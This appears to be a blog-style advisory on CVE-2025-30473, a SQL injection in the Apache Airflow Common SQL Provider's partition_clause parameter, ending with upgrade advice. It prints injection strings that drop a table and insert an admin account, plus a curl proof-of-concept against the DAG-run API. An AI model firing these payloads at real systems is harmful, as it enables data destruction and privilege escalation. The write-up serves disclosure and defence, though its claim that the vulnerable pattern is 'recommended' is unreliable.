CVE-2025-30473 - SQL Injection Flaw in Apache Airflow Common SQL Provider Can Lead to Privilege Escalation
A new security vulnerability, CVE-2025-30473, was discovered in the Apache Airflow Common SQL Provider (versions before 1.24.1). This flaw allows authenticated users to inject arbitrary SQL code via the partition_clause parameter when using the SQLTableCheckOperator. This post breaks down how the vulnerability works, what makes it dangerous, how to exploit it, and how to protect your Airflow instance.
What Is Apache Airflow Common SQL Provider?
Apache Airflow is an open-source platform to programmatically author, schedule, and monitor workflows. The Common SQL Provider is a package that provides operators and helpers to execute SQL commands on different database backends.
Description
- Vulnerability Name: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
- CVE: CVE-2025-30473
How It Happens
Airflow lets users trigger Directed Acyclic Graph (DAG) runs via the Web UI. For SQL validation, many workflows use the SQLTableCheckOperator with a parameter named partition_clause. This clause is appended directly into a SQL query without proper escaping or sanitization.
When an authenticated Airflow UI user triggers a DAG and controls the partition_clause, they can inject malicious SQL.
Why is this bad?
This gives the user a way to run arbitrary SQL on the connected database—as the Airflow service account! Any privilege granted to Airflow is now also available to any authenticated UI user.
Suppose you have a DAG like this
from airflow.providers.common.sql.operators.sql import SQLTableCheckOperator
check_partition = SQLTableCheckOperator(
task_id="check_table",
table="users",
partition_clause="{{ dag_run.conf.get('partition_clause', '') }}", # This comes from the user
sql_conn_id="my_database"
)
A well-intentioned use might supply
partition_clause = "WHERE created_at >= '2024-06-01'"
But what if a crafty user supplies this as the partition_clause?
partition_clause = "WHERE 1=1; DROP TABLE important_data; --"
So the query generated becomes
SELECT * FROM users WHERE 1=1; DROP TABLE important_data; -- ...
If the database allows multiple statements per command, this deletes data!
Exploit Demonstration
Here's a simplified proof-of-concept using Airflow's REST API (you need to be an authenticated Airflow user):
curl -X POST http://your-airflow-instance/api/v1/dags/my_dag/dagRuns \
-H "Authorization: Basic YWRtaW46cGFzc3dvcmQ=" \
-H 'Content-Type: application/json' \
-d '{
"conf": {
"partition_clause": "WHERE 1=1; INSERT INTO admin_users(username, password) VALUES (''malicious'',''pwned''); --"
}
}'
If the DAG uses partition_clause in SQLTableCheckOperator as recommended, the attacker’s SQL is executed under the Airflow database user.
Data Exfiltration: Attackers could select sensitive data.
- Data Manipulation/Destruction: Attackers could insert, update, or delete data—or entire tables.
- Privilege Escalation: Attackers can grant themselves DBA privileges or inject new admin accounts.
- Persistence and Backdoors: By executing arbitrary SQL, attackers can insert triggers or jobs for persistence.
Who's at Risk?
Anyone running Apache Airflow Common SQL Provider < 1.24.1 who uses SQLTableCheckOperator and exposes partition_clause input to users—either via the UI or API.
Patch
Upgrade to Airflow Common SQL Provider version 1.24.1 or later.
Download latest releases here.
pip install --upgrade 'apache-airflow-providers-common-sql>=1.24.1'
Reference:
- ASF Security advisory (mailing list)
- Official Airflow release notes
Conclusion
CVE-2025-30473 is a critical SQL injection vulnerability allowing any authenticated Airflow UI user to escalate privileges and take control of your database via a common pattern in DAGs.
If you use Airflow Common SQL Provider, upgrade now to 1.24.1 or later to stay safe.
Further Reading
- Apache Airflow Security
- OWASP SQL Injection
- CVE-2025-30473 @ Mitre
Timeline
Published on: 04/07/2025 09:15:16 UTC
Last modified on: 04/11/2025 12:59:03 UTC